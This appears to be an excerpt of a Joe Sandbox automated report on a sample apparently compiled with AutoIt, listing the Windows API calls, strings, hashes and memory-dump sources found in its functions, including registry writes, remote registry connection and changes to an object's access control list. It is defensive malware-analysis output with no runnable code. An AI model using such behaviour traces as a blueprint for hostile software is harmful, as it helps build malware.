                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                    • String ID:
                                    • API String ID: 4124339563-0
                                    APIs
                                    • DestroyWindow.USER32(?,?), ref: 00798E14
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 007D6AC5
                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007D6AFE
                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007D6F43
                                      • Part of subcall function 00798F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00798BE8,?,00000000,?,?,?,?,00798BBA,00000000,?), ref: 00798FC5
                                    • SendMessageW.USER32(?,00001053), ref: 007D6F7F
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007D6F96
                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 007D6FAC
                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 007D6FB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                    • String ID: 0
                                    • API String ID: 2760611726-4108050209
                                    APIs
                                    • DestroyWindow.USER32(00000000), ref: 0080273E
                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0080286A
                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 008028A9
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008028B9
                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00802900
                                    • GetClientRect.USER32(00000000,?), ref: 0080290C
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00802955
                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00802964
                                    • GetStockObject.GDI32(00000011), ref: 00802974
                                    • SelectObject.GDI32(00000000,00000000), ref: 00802978
                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00802988
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00802991
                                    • DeleteDC.GDI32(00000000), ref: 0080299A
                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008029C6
                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 008029DD
                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00802A1D
                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00802A31
                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00802A42
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00802A77
                                    • GetStockObject.GDI32(00000011), ref: 00802A82
                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00802A8D
                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00802A97
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                    • API String ID: 2910397461-517079104
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 007F4AED
                                    • GetDriveTypeW.KERNEL32(?,0081CB68,?,\\.\,0081CC08), ref: 007F4BCA
                                    • SetErrorMode.KERNEL32(00000000,0081CB68,?,\\.\,0081CC08), ref: 007F4D36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 00817421
                                    • SetTextColor.GDI32(?,?), ref: 00817425
                                    • GetSysColorBrush.USER32(0000000F), ref: 0081743B
                                    • GetSysColor.USER32(0000000F), ref: 00817446
                                    • CreateSolidBrush.GDI32(?), ref: 0081744B
                                    • GetSysColor.USER32(00000011), ref: 00817463
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00817471
                                    • SelectObject.GDI32(?,00000000), ref: 00817482
                                    • SetBkColor.GDI32(?,00000000), ref: 0081748B
                                    • SelectObject.GDI32(?,?), ref: 00817498
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 008174B7
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008174CE
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 008174DB
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0081752A
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00817554
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00817572
                                    • DrawFocusRect.USER32(?,?), ref: 0081757D
                                    • GetSysColor.USER32(00000011), ref: 0081758E
                                    • SetTextColor.GDI32(?,00000000), ref: 00817596
                                    • DrawTextW.USER32(?,008170F5,000000FF,?,00000000), ref: 008175A8
                                    • SelectObject.GDI32(?,?), ref: 008175BF
                                    • DeleteObject.GDI32(?), ref: 008175CA
                                    • SelectObject.GDI32(?,?), ref: 008175D0
                                    • DeleteObject.GDI32(?), ref: 008175D5
                                    • SetTextColor.GDI32(?,?), ref: 008175DB
                                    • SetBkColor.GDI32(?,?), ref: 008175E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00811128
                                    • GetDesktopWindow.USER32 ref: 0081113D
                                    • GetWindowRect.USER32(00000000), ref: 00811144
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00811199
                                    • DestroyWindow.USER32(?), ref: 008111B9
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008111ED
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0081120B
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0081121D
                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00811232
                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00811245
                                    • IsWindowVisible.USER32(00000000), ref: 008112A1
                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 008112BC
                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 008112D0
                                    • GetWindowRect.USER32(00000000,?), ref: 008112E8
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0081130E
                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00811328
                                    • CopyRect.USER32(?,?), ref: 0081133F
                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 008113AA
                                    Strings
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: 51ea247b24774d6c8448c558e48fc22ca1ca8511ade5f19c6ca88cae7cef6016
                                    • Instruction ID: 19af1d008961997e2e53c14796be467db5643934c2182bb776c0f37b64177d46
                                    • Opcode Fuzzy Hash: 51ea247b24774d6c8448c558e48fc22ca1ca8511ade5f19c6ca88cae7cef6016
                                    • Instruction Fuzzy Hash: 40B16F71604341AFDB14DF64C889BAABBE8FF88754F00891CFA99DB2A1C775D844CB51
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00798968
                                    • GetSystemMetrics.USER32(00000007), ref: 00798970
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0079899B
                                    • GetSystemMetrics.USER32(00000008), ref: 007989A3
                                    • GetSystemMetrics.USER32(00000004), ref: 007989C8
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007989E5
                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007989F5
                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00798A28
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00798A3C
                                    • GetClientRect.USER32(00000000,000000FF), ref: 00798A5A
                                    • GetStockObject.GDI32(00000011), ref: 00798A76
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00798A81
                                      • Part of subcall function 0079912D: GetCursorPos.USER32(?), ref: 00799141
                                      • Part of subcall function 0079912D: ScreenToClient.USER32(00000000,?), ref: 0079915E
                                      • Part of subcall function 0079912D: GetAsyncKeyState.USER32(00000001), ref: 00799183
                                      • Part of subcall function 0079912D: GetAsyncKeyState.USER32(00000002), ref: 0079919D
                                    • SetTimer.USER32(00000000,00000000,00000028,007990FC), ref: 00798AA8
                                    Strings
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: c6ad45a9700b4538b76c0c79f6f033ad24abe6b64702d910bed51dae06fb3024
                                    • Instruction ID: 25dc4ec3f746fa2383c690fb10d5597037b2072ff7df72b9d2705f4b5ee69fbf
                                    • Opcode Fuzzy Hash: c6ad45a9700b4538b76c0c79f6f033ad24abe6b64702d910bed51dae06fb3024
                                    • Instruction Fuzzy Hash: 9FB13B75A402099FDF14DFA8DC49BEA7BB5FB48325F10422AFA15A7290DB78A840CB51
                                    APIs
                                      • Part of subcall function 007E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007E1114
                                      • Part of subcall function 007E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E1120
                                      • Part of subcall function 007E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E112F
                                      • Part of subcall function 007E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E1136
                                      • Part of subcall function 007E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007E114D
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007E0DF5
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007E0E29
                                    • GetLengthSid.ADVAPI32(?), ref: 007E0E40
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 007E0E7A
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007E0E96
                                    • GetLengthSid.ADVAPI32(?), ref: 007E0EAD
                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 007E0EB5
                                    • HeapAlloc.KERNEL32(00000000), ref: 007E0EBC
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007E0EDD
                                    • CopySid.ADVAPI32(00000000), ref: 007E0EE4
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007E0F13
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007E0F35
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007E0F47
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E0F6E
                                    • HeapFree.KERNEL32(00000000), ref: 007E0F75
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E0F7E
                                    • HeapFree.KERNEL32(00000000), ref: 007E0F85
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E0F8E
                                    • HeapFree.KERNEL32(00000000), ref: 007E0F95
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007E0FA1
                                    • HeapFree.KERNEL32(00000000), ref: 007E0FA8
                                      • Part of subcall function 007E1193: GetProcessHeap.KERNEL32(00000008,007E0BB1,?,00000000,?,007E0BB1,?), ref: 007E11A1
                                      • Part of subcall function 007E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,007E0BB1,?), ref: 007E11A8
                                      • Part of subcall function 007E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007E0BB1,?), ref: 007E11B7
                                    Similarity
                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                    • String ID:
                                    • API String ID: 4175595110-0
                                    • Opcode ID: f573da656c9ceb0933d91c4124d01dd407dfde96d860c3aa5a4c1bf8c43a3297
                                    • Instruction ID: ce454783c9134eb21af9b5ddd889682236157b0e50afdbc349362d6dd3b10863
                                    • Opcode Fuzzy Hash: f573da656c9ceb0933d91c4124d01dd407dfde96d860c3aa5a4c1bf8c43a3297
                                    • Instruction Fuzzy Hash: 6D717A7294124AEBDB209FA5DC48BEEBBBCBF08300F048125F959E6191D7749E55CBA0
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0080C4BD
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0081CC08,00000000,?,00000000,?,?), ref: 0080C544
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0080C5A4
                                    • _wcslen.LIBCMT ref: 0080C5F4
                                    • _wcslen.LIBCMT ref: 0080C66F
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0080C6B2
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0080C7C1
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0080C84D
                                    • RegCloseKey.ADVAPI32(?), ref: 0080C881
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0080C88E
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0080C960
                                    Strings
                                    Similarity
                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 9721498-966354055
                                    • Opcode ID: b45a5000bb0a22a7f140c94c4610bbbad37b5f25b8670d7d62b18dea6a6905ae
                                    • Instruction ID: 816489da2f7a18c58898366814d2891d2e5be59cce81d7180905f87b751df518
                                    • Opcode Fuzzy Hash: b45a5000bb0a22a7f140c94c4610bbbad37b5f25b8670d7d62b18dea6a6905ae
                                    • Instruction Fuzzy Hash: 61126835204201DFDB14EF14C885A2AB7E5FF88714F18899CF89A9B3A2DB35ED41CB95
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 008109C6
                                    • _wcslen.LIBCMT ref: 00810A01
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00810A54
                                    • _wcslen.LIBCMT ref: 00810A8A
                                    • _wcslen.LIBCMT ref: 00810B06
                                    • _wcslen.LIBCMT ref: 00810B81
                                      • Part of subcall function 0079F9F2: _wcslen.LIBCMT ref: 0079F9FD
                                      • Part of subcall function 007E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007E2BFA
                                    Strings
                                    Similarity
                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 1103490817-4258414348
                                    • Opcode ID: 929c07897495c8cedb6c0f0205ef04eb9393bc82e6a41f5b7480a58fd6f111bb
                                    • Instruction ID: 8dd8ec93794cfae503df50f05c1a049290414dc80a365ecf531706b343699568
                                    • Opcode Fuzzy Hash: 929c07897495c8cedb6c0f0205ef04eb9393bc82e6a41f5b7480a58fd6f111bb
                                    • Instruction Fuzzy Hash: C0E17631208305DFCB14EF24C8509AAB7E9FF98318B148958F8969B2A2D774ED85CB91
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 1256254125-909552448
                                    • Opcode ID: e0552b291dab0751d220f9f9f9b5c05c978ba6a015589f28d706241fe8c6b8f9
                                    • Instruction ID: 7296fbd459ce62fbc94d2e4697e8db7ffaccb99d71fc61375559a8652ee53b14
                                    • Opcode Fuzzy Hash: e0552b291dab0751d220f9f9f9b5c05c978ba6a015589f28d706241fe8c6b8f9
                                    • Instruction Fuzzy Hash: C071EF7260016A8BCB60DFACCC516BB3395FBA1764B650728FC66E72C4E739DD4483A0
                                    APIs
                                    • _wcslen.LIBCMT ref: 0081835A
                                    • _wcslen.LIBCMT ref: 0081836E
                                    • _wcslen.LIBCMT ref: 00818391
                                    • _wcslen.LIBCMT ref: 008183B4
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008183F2
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0081361A,?), ref: 0081844E
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00818487
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008184CA
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00818501
                                    • FreeLibrary.KERNEL32(?), ref: 0081850D
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0081851D
                                    • DestroyIcon.USER32(?), ref: 0081852C
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00818549
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00818555
                                    Strings
                                    Similarity
                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 799131459-1154884017
                                    • Opcode ID: 602d57034d4d289329289eacfbdeacf95f10555b8461fc9f3889fc2263ac968f
                                    • Instruction ID: 91ca45ce28b03f4ae9bebe65b61d876a5ed4dafce0c0a900eb49335c723ddcf0
                                    • Opcode Fuzzy Hash: 602d57034d4d289329289eacfbdeacf95f10555b8461fc9f3889fc2263ac968f
                                    • Instruction Fuzzy Hash: 3661AC71540219FAEB149B64CC46BFE77ACFF48B11F108609F815E61D1DBB9A990CBA0
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 0-1645009161
                                    • Opcode ID: 82674bbd53ffa74cd235bc9708ae0557cdd659503ade22fbe2510f88bb04280c
                                    • Instruction ID: 6622ff3fc9e1a7ce8cf3d5c4d515ffd1f9a0fc9d48bca4269e7a34191356c83a
                                    • Opcode Fuzzy Hash: 82674bbd53ffa74cd235bc9708ae0557cdd659503ade22fbe2510f88bb04280c
                                    • Instruction Fuzzy Hash: 8B814870688605FBDB24BF20CC4AFAE77A8FF55300F144028F916AA186EB7DD950C7A1
                                    APIs
                                    • CharLowerBuffW.USER32(?,?), ref: 007F3EF8
                                    • _wcslen.LIBCMT ref: 007F3F03
                                    • _wcslen.LIBCMT ref: 007F3F5A
                                    • _wcslen.LIBCMT ref: 007F3F98
                                    • GetDriveTypeW.KERNEL32(?), ref: 007F3FD6
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007F401E
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007F4059
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007F4087
                                    Strings
                                    Similarity
                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 1839972693-4113822522
                                    • Opcode ID: a2882c89835be990e85d6fbdd5789c7480bbf4e83967f3e41f286f67a25fd929
                                    • Instruction ID: cdff9df75690b6e2c37529f75ef8ef10c34708e4f302eab68fc28bce2d4fb85b
                                    • Opcode Fuzzy Hash: a2882c89835be990e85d6fbdd5789c7480bbf4e83967f3e41f286f67a25fd929
                                    • Instruction Fuzzy Hash: 9171AC7260420A9FC310EF24C88087AB7E4FF95768B10492DFA9597351EB39EE45CB52
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 007E5A2E
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007E5A40
                                    • SetWindowTextW.USER32(?,?), ref: 007E5A57
                                    • GetDlgItem.USER32(?,000003EA), ref: 007E5A6C
                                    • SetWindowTextW.USER32(00000000,?), ref: 007E5A72
                                    • GetDlgItem.USER32(?,000003E9), ref: 007E5A82
                                    • SetWindowTextW.USER32(00000000,?), ref: 007E5A88
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007E5AA9
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007E5AC3
                                    • GetWindowRect.USER32(?,?), ref: 007E5ACC
                                    • _wcslen.LIBCMT ref: 007E5B33
                                    • SetWindowTextW.USER32(?,?), ref: 007E5B6F
                                    • GetDesktopWindow.USER32 ref: 007E5B75
                                    • GetWindowRect.USER32(00000000), ref: 007E5B7C
                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 007E5BD3
                                    • GetClientRect.USER32(?,?), ref: 007E5BE0
                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 007E5C05
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007E5C2F
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                    • String ID:
                                    • API String ID: 895679908-0
                                    • Opcode ID: 587880afd852675649b999b0b9b92d7000f7b1df0c9b37b6526deb17f3b72f8f
                                    • Instruction ID: caf2007947aa4fe7de7a3ef03f203e0f33b8af44af2a711be24f252b1529a245
                                    • Opcode Fuzzy Hash: 587880afd852675649b999b0b9b92d7000f7b1df0c9b37b6526deb17f3b72f8f
                                    • Instruction Fuzzy Hash: 5D718F71900B49EFDB20DFA9CE85AAEBBF5FF48708F10451CE142A25A0D779E940CB50
                                    APIs
                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 007A00C6
                                      • Part of subcall function 007A00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0085070C,00000FA0,3FDB023C,?,?,?,?,007C23B3,000000FF), ref: 007A011C
                                      • Part of subcall function 007A00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,007C23B3,000000FF), ref: 007A0127
                                      • Part of subcall function 007A00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,007C23B3,000000FF), ref: 007A0138
                                      • Part of subcall function 007A00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 007A014E
                                      • Part of subcall function 007A00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 007A015C
                                      • Part of subcall function 007A00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 007A016A
                                      • Part of subcall function 007A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007A0195
                                      • Part of subcall function 007A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007A01A0
                                    • ___scrt_fastfail.LIBCMT ref: 007A00E7
                                      • Part of subcall function 007A00A3: __onexit.LIBCMT ref: 007A00A9
                                    Strings
                                    • WakeAllConditionVariable, xrefs: 007A0162
                                    • SleepConditionVariableCS, xrefs: 007A0154
                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 007A0122
                                    • kernel32.dll, xrefs: 007A0133
                                    • InitializeConditionVariable, xrefs: 007A0148
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                    • API String ID: 66158676-1714406822
                                    • Opcode ID: 2d34b94f7bf5b1dbeafea92f3eb294e99235bab475d6d07b9f5b89a1020dfc65
                                    • Instruction ID: 62138afd2d7d371bbffd48f3530fc5018fd1f81085ca177a4798a3534a8f9412
                                    • Opcode Fuzzy Hash: 2d34b94f7bf5b1dbeafea92f3eb294e99235bab475d6d07b9f5b89a1020dfc65
                                    • Instruction Fuzzy Hash: DF21D772685715ABDB105B64FC0ABEE37ECFF86B51F004629F911D2392DB6D98008AD0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
